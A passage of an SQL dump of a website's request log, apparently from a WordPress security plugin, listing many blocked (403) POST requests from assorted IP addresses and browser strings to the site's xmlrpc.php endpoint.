Client\"}','nJUDF1bitPWur0AYgC5hEjTZ',0,1681648394.3952,1618,'','GET',403,0,700,0,1,'',0),('200.58.111.21',3359272725,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','OEFH4iV5QynC6dA1bSIhRLMx',0,1681649710.5721,1478,'','POST',403,0,515,0,1,'',0),('72.167.222.62',1218960958,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','M9ovdmgSELZIKW0HuYpz3Xwb',0,1681649721.6325,934,'','POST',403,0,515,0,1,'',0),('47.242.255.46',804454190,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','JcSNHn83dD1ZiPwKIWhE2RaX',0,1681649722.1797,983,'','POST',403,0,515,0,1,'',0),('152.136.247.142',2559113102,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','msEUc4z5wxfkTt7ohalB2nyu',0,1681649727.5947,568,'','POST',403,0,515,0,1,'',0),('185.116.195.172',3111437228,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','QTAd6vFZM3x52VXUzh1Wb4ut',0,1681649740.0422,624,'','POST',403,0,515,0,1,'',0),('195.158.22.187',3281917627,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','dSkTt9urxYhb3EnclX7NM6vp',0,1681649741.2185,564,'','POST',403,0,515,0,1,'',0),('88.214.28.5',1490426885,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','Yr7fmLKyhidS3UjWzDoswFM6',0,1681649748.0490,657,'','POST',403,0,515,0,1,'',0),('185.182.56.150',3115726998,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','95AlO6nQxNZeRosYjC7Ttvim',0,1681651929.7992,638,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','7ckurzfCdjMwADStvBRGLyJK',0,1681651931.1103,700,'','POST',403,0,515,0,1,'',0),('162.0.232.58',2717968442,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','0QYPvV4W8UyItuXjoG7AOmEz',0,1681651938.6417,580,'','POST',403,0,515,0,1,'',0),('103.171.180.165',1739306149,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','ZqV50wl84PxBhrzL9a76AGek',0,1681651951.2955,1189,'','POST',403,0,515,0,1,'',0),('216.24.188.8',3625499656,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','Uwh6IQsuVB4RcyNOzge0TmLx',0,1681651951.6621,1100,'','POST',403,0,515,0,1,'',0),('101.50.2.67',1697776195,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','FR1kiB4TSHqWaO7l6MepxmEA',0,1681651959.2501,613,'','POST',403,0,515,0,1,'',0),('216.24.188.8',3625499656,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','BtwqPCvZ4EVlnI59rRKgyTAS',0,1681651963.1718,1904,'','POST',403,0,515,0,1,'',0),('198.71.235.55',3326602039,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','Ql1URO6KZFDfzNmB97u2IrSh',0,1681651963.3681,1807,'','POST',403,0,515,0,1,'',0),('87.101.92.171',1466260651,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','7VvDOQCtAo62m8qUgeGxKSbJ',0,1681652326.6869,3637,'','POST',403,0,515,0,1,'',0),('156.96.151.132',2623575940,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','dAZLEH41v6I0CBTS23thofDu',0,1681653972.3337,3512,'','POST',403,0,515,0,1,'',0),('213.152.161.244',3583549940,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','PTxkAVKt2BZ3EeYomXNMR61j',0,1681655859.0961,3909,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','ZiGldPUYEenM0zaXqfx6tHrR',0,1681656650.6336,4100,'','POST',403,0,515,0,1,'',0),('192.64.117.65',3225449793,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','vWDOadznUt9Be1SmrkJIHfNP',0,1681656655.4869,590,'','POST',403,0,515,0,1,'',0),('82.165.86.47',1386567215,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','9iU4LRr7InW5ucwOoXsabH8x',0,1681656659.5640,601,'','POST',403,0,515,0,1,'',0),('5.39.4.40',86443048,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','y1m8DQ4aRUC2sPbxqceFO9lX',0,1681656673.9558,1312,'','POST',403,0,515,0,1,'',0),('178.32.187.122',2988489594,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','of47iqgsxRzP2ap6DUcTAeOn',0,1681656674.2436,1173,'','POST',403,0,515,0,1,'',0),('5.9.59.22',84491030,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','mYg5wGFK3kh1XirPDOoalxVd',0,1681656790.5556,739,'','POST',403,0,515,0,1,'',0),('51.195.124.72',868449352,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','WuNH1CfwhGIcnyBgze3qdsSa',0,1681656796.0022,613,'','POST',403,0,515,0,1,'',0),('182.50.151.70',3056768838,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','JU0Vf3mlxMOZ1ytKEpnC4RgI',0,1681656797.4536,568,'','POST',403,0,515,0,1,'',0),('109.94.209.234',1834930666,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','H50hUIECkGx2lVsgiZaey3vF',0,1681656813.0070,656,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','MHZpwNOxkcLDIA1RvyCQTW6i',0,1681656815.9570,585,'','POST',403,0,515,0,1,'',0),('149.127.214.172',2508183212,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','kl3DLd8hnAR5X9qjOFHKtZNG',0,1681656816.8509,554,'','POST',403,0,515,0,1,'',0),('75.119.135.6',1266124550,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','5uFncLSi7oJfIl9GsbDCvKgA',0,1681656824.1519,587,'','POST',403,0,515,0,1,'',0),('82.130.0.72',1384251464,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','RwQ7rOVip4NB3KSZdvzLPahM',0,1681656831.5927,572,'','POST',403,0,515,0,1,'',0),('178.32.201.69',2988493125,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','5mwAxeOpP8ashqiYdXNfMT7I',0,1681656833.7348,637,'','POST',403,0,515,0,1,'',0),('54.36.174.113',908373617,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','Sk5RIt0yEV9JCxijTYorG4Wb',0,1681657470.5801,1531,'','POST',403,0,515,0,1,'',0),('60.205.227.183',1020126135,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','p4SjAIklVqrORYQagDN08mub',0,1681657468.3645,3894,'','POST',403,0,515,0,1,'',0),('108.170.11.42',1823083306,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','hnFQjbe37cf6ilGNSsoMzupL',0,1681657472.4873,972,'','POST',403,0,515,0,1,'',0),('208.109.61.155',3496820123,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','1PRXnN8Lt2Iu0aEzUf6BbCvW',0,1681657473.8180,617,'','POST',403,0,515,0,1,'',0),('128.199.67.142',2160542606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','qDX2NzT957dxeAjsp0ZhPgaK',0,1681657481.4261,667,'','POST',403,0,515,0,1,'',0),('62.102.148.160',1046910112,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','nfDBUlQRgbpAVjhwzXTO5ria',0,1681659970.6380,3752,'','POST',403,0,515,0,1,'',0),('31.172.80.82',531386450,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','TouCDIWVOg2GyMv5haltzH41',0,1681671483.9602,1476,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','ysSVhknl3cbKe2JEMOtXQTir',0,1681671481.2896,4159,'','POST',403,0,515,0,1,'',0),('5.9.59.22',84491030,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','ozfWUP5Rw7VtAe4LypqIKuhG',0,1681671486.5716,609,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','lDcUAPEy4HfMsLgxIb87Cz3Y',0,1681671491.9485,561,'','POST',403,0,515,0,1,'',0),('198.54.124.210',3325459666,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','JxSfzg836tj5iYZyBrVQGNFD',0,1681671495.6005,594,'','POST',403,0,515,0,1,'',0),('47.242.255.46',804454190,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','mv0HpFAJRjdhzY6qOZfrILlD',0,1681671499.3673,622,'','POST',403,0,515,0,1,'',0),('51.132.254.35',864353827,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','h0XGn7mdceqIplvu8f3yJgFj',0,1681671500.1042,608,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','zLx83G0ioVPpwaXcHy95vnOI',0,1681671502.0296,544,'','POST',403,0,515,0,1,'',0),('103.221.223.238',1742594030,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','6DXR4L3ahjpnPm82v7WkB9CH',0,1681671513.9515,585,'','POST',403,0,515,0,1,'',0),('103.146.176.238',1737666798,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','uKnSAEOIi6ol3jmh0zZGtVrD',0,1681671525.1313,551,'','POST',403,0,515,0,1,'',0),('173.231.207.89',2917650265,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','yj7k9wVlDt0C13biYBepcUrN',0,1681674062.7060,3495,'','POST',403,0,515,0,1,'',0),('46.38.249.174',774306222,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','TaARtrumFzZ30d9ObxLhqp42',0,1681674067.4641,555,'','POST',403,0,515,0,1,'',0),('207.55.248.19',3476551699,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','iU5ps3vW892wRVKmNTQ7EGye',0,1681674075.0171,677,'','POST',403,0,515,0,1,'',0),('104.247.108.18',1761045522,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','dvTlYJQPE2K3cHruq48URSMF',0,1681674083.3735,549,'','POST',403,0,515,0,1,'',0),('114.215.93.65',1926716737,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','CAq3PdIpXrMj1yJvFgVbi94R',0,1681674088.6984,630,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','AHmd9nXbcuGWLirJ6ptUlxhj',0,1681674090.8054,562,'','POST',403,0,515,0,1,'',0),('47.243.171.230',804498406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','yqoDmh9WMNJXRi7zPsTeGAC4',0,1681674098.5136,595,'','POST',403,0,515,0,1,'',0),('81.88.53.33',1364735265,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','DPw6z03FdGuUq2bBhMK5JoWV',0,1681674678.5129,2837,'','POST',403,0,515,0,1,'',0),('204.93.196.26',3428697114,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','fWgkZF0hMYm6cO3uHCTrp2Io',0,1681674679.2738,2753,'','POST',403,0,515,0,1,'',0),('209.205.218.106',3519928938,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','h5QtAYDe3bwFHsNyUji9TPfz',0,1681674682.7574,585,'','POST',403,0,515,0,1,'',0),('101.50.2.67',1697776195,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','6rwNxuzf9VoTyYHhIGvEeWpM',0,1681674687.7856,609,'','POST',403,0,515,0,1,'',0),('199.16.131.160',3339748256,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','Jm6xyRsqCMLkZ5KhvpBjWPde',0,1681674692.9026,537,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','tPBy0Q53mCXc94ZsWgjYD12q',0,1681674696.9382,553,'','POST',403,0,515,0,1,'',0),('50.31.160.250',840933626,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','6cZ7uaC5GWbgS4vXHAOojkJF',0,1681674701.1594,579,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','jJR1nPk03h5vIpCmErzFLiOe',0,1681674702.6197,630,'','POST',403,0,515,0,1,'',0),('5.161.122.207',94468815,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','7VIv4KB9tmG6eNoc3TOhpgDk',0,1681674708.8836,548,'','POST',403,0,515,0,1,'',0),('37.187.1.231',633012711,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','0hdgepH5sY7VkqXEc6ubPUQ2',0,1681674715.5845,573,'','POST',403,0,515,0,1,'',0),('178.162.204.214',2997013718,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','D78A2a3niozhdFfCsyWIZgv5',0,1681675468.9447,3820,'','POST',403,0,515,0,1,'',0),('213.152.162.149',3583550101,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','NEerGWH2zcCbAZd5mls1Q86u',0,1681676918.8787,725,'','POST',403,0,515,0,1,'',0),('43.155.103.11',731604747,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Upmbyx5YJgXOqvRjKN9LrP0n',0,1681678690.5301,2143,'','POST',403,0,515,0,1,'',0),('198.71.235.55',3326602039,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','QiNlzAgsJd7LUuFpKn58cvhM',0,1681678689.0119,4313,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','aSG3D2KEe0gYLqpBcCyhobW7',0,1681678693.9390,741,'','POST',403,0,515,0,1,'',0),('103.171.180.165',1739306149,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','uo2Az4XMSJfeisgZmGLyVhIB',0,1681678700.7749,589,'','POST',403,0,515,0,1,'',0),('144.76.74.227',2420919011,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','kWgvOdaNVfQnZIqDe12jH6rt',0,1681678705.2510,589,'','POST',403,0,515,0,1,'',0),('182.50.151.70',3056768838,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','0sWCVR1jnN9ULezuOZol5T36',0,1681678706.4312,565,'','POST',403,0,515,0,1,'',0),('59.106.222.53',996859445,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','esbQp7DTFRSoaq1kldPwML8h',0,1681678713.5745,590,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','LvnYi2asTVpFOZljofUSdCrB',0,1681678720.9810,557,'','POST',403,0,515,0,1,'',0),('188.68.47.117',3158585205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','CtIHQfKMUNnPj86EOZ4ks2Td',0,1681678730.7060,578,'','POST',403,0,515,0,1,'',0),('217.70.186.133',3645291141,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','GOKrcIZVXqkExAdW6Li9PRSn',0,1681678777.4600,548,'','POST',403,0,515,0,1,'',0),('62.102.148.189',1046910141,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','PMpW6Ba72ygOUiXl9GTSukbx',0,1681679063.9109,3582,'','POST',403,0,515,0,1,'',0),('167.86.123.58',2807462714,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ArzND6tlaY3iJpQhgFHZKRdq',0,1681679646.6541,4136,'','POST',403,0,515,0,1,'',0),('47.243.171.230',804498406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','dpBYgaezqlD7S06LcOH1ot3b',0,1681679651.0969,592,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','b9dEt0usRYG3UBwI15lCrxvz',0,1681679656.2891,559,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like 